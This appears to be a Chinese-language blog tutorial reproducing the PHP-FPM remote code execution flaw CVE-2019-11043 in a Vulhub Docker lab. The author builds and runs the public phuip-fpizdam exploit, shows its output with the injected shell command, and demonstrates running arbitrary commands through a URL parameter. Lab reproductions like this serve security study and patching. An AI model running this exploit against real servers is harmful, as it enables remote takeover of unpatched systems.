PHP远程代码执行漏洞 CVE-2019-11043

 

PHP5.4版本未受影响,PHP5.6以上版本会造成服务崩溃,PHP7.0以上版本可以执行远程命令执行

 

漏洞原理和介绍

https://www.freebuf.com/articles/web/217836.html

 

漏洞环境搭建

利用VulHub项目,使用Docker搭建漏洞环境

下载 CVE-2019-11043的漏洞环境并部署

https://github.com/vulhub/vulhub/tree/master/php/CVE-2019-11043

#Git克隆可能会失败,可以直接下载,将其解压到目标服务器,此处直接在VulHub环境里面运行了

进入项目目录后,开启容器

docker-compose up -d

此时即可访问目标地址,IP为容器实际IP

http://192.168.36.133:8080/index.php

 

#查看容器进程

docker ps

#结束容器进程

docker stop 容器进程的ID

漏洞复现

Windows环境,已安装Go编译环境

下载POC,https://github.com/neex/phuip-fpizdam

解压该项目文件,以管理员身份运行cmd进入项目目录,在项目目录内执行go
build编译项目

编译完成后执行该exe文件,其中后缀url即有漏洞的地址,注意要带实际php文件

E:\Downloads\phuip-fpizdam-master>phuip-fpizdam.exe "http://192.168.36.133:8080/index.php"

运行成功结果如下

E:\Downloads\phuip-fpizdam-master>phuip-fpizdam.exe "http://192.168.36.133:8080/index.php" 2019/11/08 16:40:46 Base status code is 200 2019/11/08 16:40:46 Status code 502 for qsl=1800, adding as a candidate 2019/11/08 16:40:46 The target is probably vulnerable. Possible QSLs: [1790 1795 1800] 2019/11/08 16:40:46 Attack params found: --qsl 1790 --pisos 35 --skip-detect 2019/11/08 16:40:46 Trying to set "session.auto_start=0"... 2019/11/08 16:40:46 Detect() returned attack params: --qsl 1790 --pisos 35 --skip-detect <-- REMEMBER THIS 2019/11/08 16:40:46 Performing attack using php.ini settings... 2019/11/08 16:40:46 Success! Was able to execute a command by appending "?a=/bin/sh+-c+'which+which'&" to URLs 2019/11/08 16:40:46 Trying to cleanup /tmp/a... 2019/11/08 16:40:46 Done!

执行成功后,可以带命令参数访问目标URL

http://192.168.36.133:8080/index.php?a=date

命令执行的结果可回显到页面上

 

#Kali环境,已安装Go编译环境

下载安装Go语言编译环境

apt-get install golang-go -y

下载POC项目

git clone https://github.com/neex/phuip-fpizdam

进入下载好后的项目,执行go build进行无参数编译

#进行无参数编译的时候注意首先确保DNS解析可达

编译成功后运行POC,注入Payload激发漏洞

./phuip-fpizdam http://192.168.36.81:8080/index.php

执行成功后结果如下

2019/11/08 03:55:23 Base status code is 200 2019/11/08 03:55:24 Status code 502 for qsl=1795, adding as a candidate 2019/11/08 03:55:24 The target is probably vulnerable. Possible QSLs: [1785 1790 1795] 2019/11/08 03:55:24 Attack params found: --qsl 1790 --pisos 243 --skip-detect 2019/11/08 03:55:24 Trying to set "session.auto_start=0"... 2019/11/08 03:55:25 Detect() returned attack params: --qsl 1790 --pisos 243 --skip-detect <-- REMEMBER THIS 2019/11/08 03:55:25 Performing attack using php.ini settings... 2019/11/08 03:55:25 Success! Was able to execute a command by appending "?a=/bin/sh+-c+'which+which'&" to URLs 2019/11/08 03:55:25 Trying to cleanup /tmp/a… 2019/11/08 03:55:25 Done!

执行成功后,可以带命令参数访问目标URL

http://192.168.36.133:8080/index.php?a=date

命令执行的结果可回显到页面上

 

 

参考链接

说明发现时间点以及修复建议

https://www.secpulse.com/archives/116482.html

漏洞复现与修复建议

https://blog.csdn.net/qq_43342566/article/details/102733144

Poc项目站点,Go语言版

https://github.com/neex/phuip-fpizdam

 

Last modification:March 4th, 2023 at 06:51 pm
© 允许规范转载
硬币投入口